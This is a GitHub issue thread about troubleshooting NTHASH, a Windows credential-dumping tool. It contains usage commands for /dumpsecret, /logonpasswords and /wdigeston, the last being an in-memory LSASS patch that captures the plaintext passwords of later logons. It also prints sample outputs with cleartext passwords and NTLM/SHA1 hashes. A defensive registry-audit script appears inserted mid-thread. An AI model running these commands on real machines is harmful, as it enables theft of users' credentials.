erwan2212 / NTHASH-FPC


Some commands not working #5

Closed Papotito123 closed 4 years ago

Papotito123 commented 4 years ago

Hello; No sweat. Just something for when you have time.

I copied, from the running OS, SAM / SYSTEM / SECURITY, and saved them as *.sav.

Then run:

1. NTHASH-win64.exe /dumpsecret /input:dpapi_system /offline

```
NTHASH 1.8 x64 by erwan2212@gmail.com
Offline=true
dumpsecret NOT OK, try adding /system
dumpsecret NOT OK, try adding /system
```

NTHASH-win64.exe /dumpsecret /input:defaultpassword /system

```
NTHASH 1.8 x64 by erwan2212@gmail.com
Impersonate:SYSTEM
dumpsecret NOT OK, try adding /system
dumpsecret NOT OK, try adding /system
```

NTHASH-win64.exe /dumpsecret /input:defaultpassword

```
NTHASH 1.8 x64 by erwan2212@gmail.com
dumpsecret NOT OK, try adding /system
dumpsecret NOT OK, try adding /system
```

Maybe I don't know how to run it?

2. About /wdigest, it runs well (I have it enabled). So I disabled it via reg and then did logout/logon.

Then run /wdigeston:

```
NTHASH-win64.exe /wdigeston
NTHASH 1.8 x64 by erwan2212@gmail.com
no patch mod for this windows version
wdigest_on NOT OK
```

Papotito123 commented 4 years ago

Hello: OK. I found dbghelp.dll and symsrv.dll in the Comae-Toolkit-master tool I recently downloaded. I copied them to the NTHASH folder.

So I have to run:

```
C:\NTHASH>NTHASH-win64.exe /logonpasswords /symbol
NTHASH 1.8 x64 by erwan2212@gmail.com

LUID:003FBCD2 username:TESTACCOUNT domain:DESKTOP-2GHHNFK
->CredentialManager:0140A9B0
-CREDENTIALW:01454670 UserName:testuser TargetName:Domain:target=DESKTOP-WINVIRT Password:@ccountf0rtesT CREDENTIALS.AuthID:00000003
->Primary
== and so on ===
```

And for /wdigeston, yeah. For /wdigeston I have to log out/log in to grab the plain-text password.

Testing some others...

NTHASH-win64.exe /dpapimk /symbol >> good

```
C:\NTHASH>NTHASH-win64.exe /enumcred2
NTHASH 1.8 x64 by erwan2212@gmail.com
2

Flags:0 Type:1 TargetName:Yandex.Browser UserName:myemail@hotmail.com CredentialBlob tvz????&X???c?,oOA??? ????   << no decryption method still for new Yandex

Flags:0 Type_:2 TargetName:DESKTOP-WINVIRT Comment:SspiPfc UserName:testuser CredentialBlob:x x x x x x x x x   <<== login password for a VBOX VM Win 10 1809
```

erwan2212 commented 4 years ago

NTHASH-win64.exe /dumpsecret

> Hello; No sweat. Just something for when you have time.
>
> I copied, from the running OS, SAM / SYSTEM / SECURITY, and saved them as *.sav.
>
> Then run: 1. NTHASH-win64.exe /dumpsecret /input:dpapi_system /offline NTHASH 1.8 x64 by erwan2212@gmail.com Offline=true dumpsecret NOT OK, try adding /system dumpsecret NOT OK, try adding /system
>
> NTHASH-win64.exe /dumpsecret /input:defaultpassword /system NTHASH 1.8 x64 by erwan2212@gmail.com Impersonate:SYSTEM dumpsecret NOT OK, try adding /system dumpsecret NOT OK, try adding /system
>
> NTHASH-win64.exe /dumpsecret /input:defaultpassword NTHASH 1.8 x64 by erwan2212@gmail.com dumpsecret NOT OK, try adding /system dumpsecret NOT OK, try adding /system
>
> Maybe I don't know how to run it?

About NTHASH-win64.exe /dumpsecret, note it is the same as /getlsasecret, with some differences, thus: dumpsecret can work offline (against a security.sav and system.sav) or online (against the loaded security registry hive) using /system.

With latest version (just uploaded), you can do /dumpsecret /input:* /system (or /offline). It will list all possible secrets. Spot one (like defaultpassword or dpapi_system) then run /dumpsecret /input:my_selected_secret /system.

Post the output using /verbose.

erwan2212 commented 4 years ago

> About /wdigest, it runs well (I have it enabled). So I disabled it via reg and then did logout/logon.
>
> Then run /wdigeston: NTHASH-win64.exe /wdigeston NTHASH 1.8 x64 by erwan2212@gmail.com no patch mod for this windows version wdigest_on NOT OK

You can find the dbghelp DLLs in dbghelpX64.zip on my github. Unzip the DLLs in the current nthash folder if you want to use /symbol. With /wdigeston, you do not need to modify the registry nor reboot - just wait until somebody logs on again. The change is only in memory and volatile, as opposed to a change in the registry.

Papotito123 commented 4 years ago

Hello; Here's the output.

Papotito123_git 13c1dee_dumpsecret verbose.txt

Thanks.

erwan2212 commented 4 years ago

> Hello; Here's the output.
>
> Papotito123_git 13c1dee_dumpsecret verbose.txt
>
> Thanks.

I took a look at your logs. It looks rather good.

dumpsecret will try the currval and oldval key for a secret, so don't worry if one or the other does not get retrieved.

Thus, the defaultpassword does not seem to work for you. DefaultPassword is NOT the same as the User Auto-logon password. This key is used to store your password the first time you set it (during windows installation). Most of the time this is obsolete unless the user never changed it.

It is also not to be confused with TBAL or the old AutoAdminLogon. I would like to work on TBAL but so far can't seem to turn it on on my windows 10 :(

About dumpsecret, note that you can also try (online only then) getlsasecret (it will read only the current value/secret, as opposed to dumpsecret which will read the current value and the old value).

I have uploaded a new binary which gives a bit more meaningful messages while performing some extra checks here and there.
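Two of the settings discussed in this thread, WDigest plaintext caching (the /wdigeston reply above) and the Winlogon auto-logon values (the DefaultPassword / AutoAdminLogon reply above), are things a defender can audit on a host. The following PowerShell script is an added example for this thread, not NTHASH code: it reads the documented Windows registry locations and reports which exposures are present. The function and variable names are this example's own; the registry paths, value names and the Sysmon event ID mentioned in the comments are documented Windows/Sysmon values.

```powershell
# Added defensive audit script (not part of NTHASH): report whether this host
# still carries the credential-exposing settings discussed in the thread.
# Registry paths and value names are documented Windows locations; the
# function and variable names are this example's own.

$WDigestKey  = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'
$WinlogonKey = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'

function Get-RegistryValueOrNull {
    param([string]$Path, [string]$Name)
    try   { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name }
    catch { $null }   # key or value missing: treated as "not set"
}

function Get-CredentialExposureFindings {
    $findings = @()

    # WDigest: UseLogonCredential = 1 tells LSASS to keep a reversible copy of
    # the logon credential in memory. On Windows 8.1 / 2012 R2 and later the
    # value is absent by default; absent or 0 is the hardened state.
    $useLogonCredential = Get-RegistryValueOrNull -Path $WDigestKey -Name 'UseLogonCredential'
    if ($useLogonCredential -eq 1) {
        $findings += 'WDigest UseLogonCredential is 1: plaintext credential caching is enabled in the registry.'
    }
    # Caveat from the thread: an in-memory patch (/wdigeston) leaves this value
    # untouched, so a clean registry does not prove LSASS is unpatched. For that
    # case, look at process-access telemetry on lsass.exe instead (for example
    # Sysmon event ID 10, ProcessAccess, from non-system callers).

    # Winlogon auto-logon: plain REG_SZ values, distinct from the LSA secret
    # named DefaultPassword that /dumpsecret reads. AutoAdminLogon = '1' with a
    # stored DefaultPassword means the logon password sits in cleartext in HKLM.
    $autoAdminLogon  = Get-RegistryValueOrNull -Path $WinlogonKey -Name 'AutoAdminLogon'
    $defaultPassword = Get-RegistryValueOrNull -Path $WinlogonKey -Name 'DefaultPassword'
    if ($autoAdminLogon -eq '1') {
        $findings += 'Winlogon AutoAdminLogon is enabled.'
    }
    if (-not [string]::IsNullOrEmpty($defaultPassword)) {
        $findings += 'Winlogon DefaultPassword value is present (cleartext password in registry).'
    }

    return @($findings)
}

$result = @(Get-CredentialExposureFindings)
if ($result.Count -eq 0) {
    Write-Output 'No WDigest or auto-logon exposure found in the registry.'
} else {
    $result | ForEach-Object { Write-Output "FINDING: $_" }
}
```

Run it from an elevated PowerShell prompt; the HKLM keys are readable by administrators without SYSTEM. The script deliberately never prints the DefaultPassword value itself, only whether it exists, so the report can be shared without copying a cleartext password into a ticket.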

Papotito123 commented 4 years ago

Hello: Thanks for the explanation. So I don't have to worry about /dumpsecret. DefaultPassword is not an option offered in every user account.

The tool is playing well.

I still haven't downloaded the latest version you mention, but the page still shows git 13c1dee. No worries.

Thanks.

erwan2212 commented 4 years ago

About TBAL, I read the excellent https://vztekoverflow.com/2018/07/31/tbal-dpapi-backdoor/. Then downloaded https://vztekoverflow.com/files/tbal/1803.zip and reviewed my code and fixed some bugs.

TBAL, if it exists, is now handled fine.

```
NTHASH-win64.exe /dumpsecret /input:M$_MSV1_0_TBALPRIMARY{22BE8E5B-58B3-4A87-BA71-41B0ECF3A9EA} /offline
NTHASH 1.8 x64 by erwan2212@gmail.com
Offline=true
CurrVal ntlm:632E627CDA1006E91D12954EB09848AE sha1:C5B1E5291BDD6BBED2A064580944D79ABCC08B41
dumpsecret NOT OK for M$_MSV1_0_TBALPRIMARY{22BE8E5B-58B3-4A87-BA71-41B0ECF3A9EA}\OldVal
```

Another way to retrieve the user sha1 password, thus unlocking many secrets.

Papotito123 commented 4 years ago

Hello: Cool. This article is a reference. That's why I paid attention when mimikatz started to throw _TBAL (also lazagne). And I found this reading.

This TBAL hash has been around since Win 8.1, but after Win10 17xx it is something common. It's just that the end user didn't see it. But even if the password is showing as _TBAL, the NTLM/SHA1 hashes are the real ones.

I didn't test the "latest-now-old" git. But I will do it with the new one.

Thanks.

Papotito123 commented 4 years ago

Hello: Just tested the latest git with /dumpsecret. Runs well. But unfortunately I can't test the _TBAL option because this happens once in a while (none in the last 2 months). And from my perspective, I think most times it is triggered when doing too many mimikatz commands so Defender got in a panic. I tell you that one day my computer booted and I got TBAL. I kept doing mimi and others. After 2 hours I shut down the computer and then the wdigest plain-text password was grabbed. Another time I had TBAL and the plain-text password switching 3 times while logged in without restarting. Like a crazy thing.

erwan2212 commented 4 years ago

/dumpsecret works fine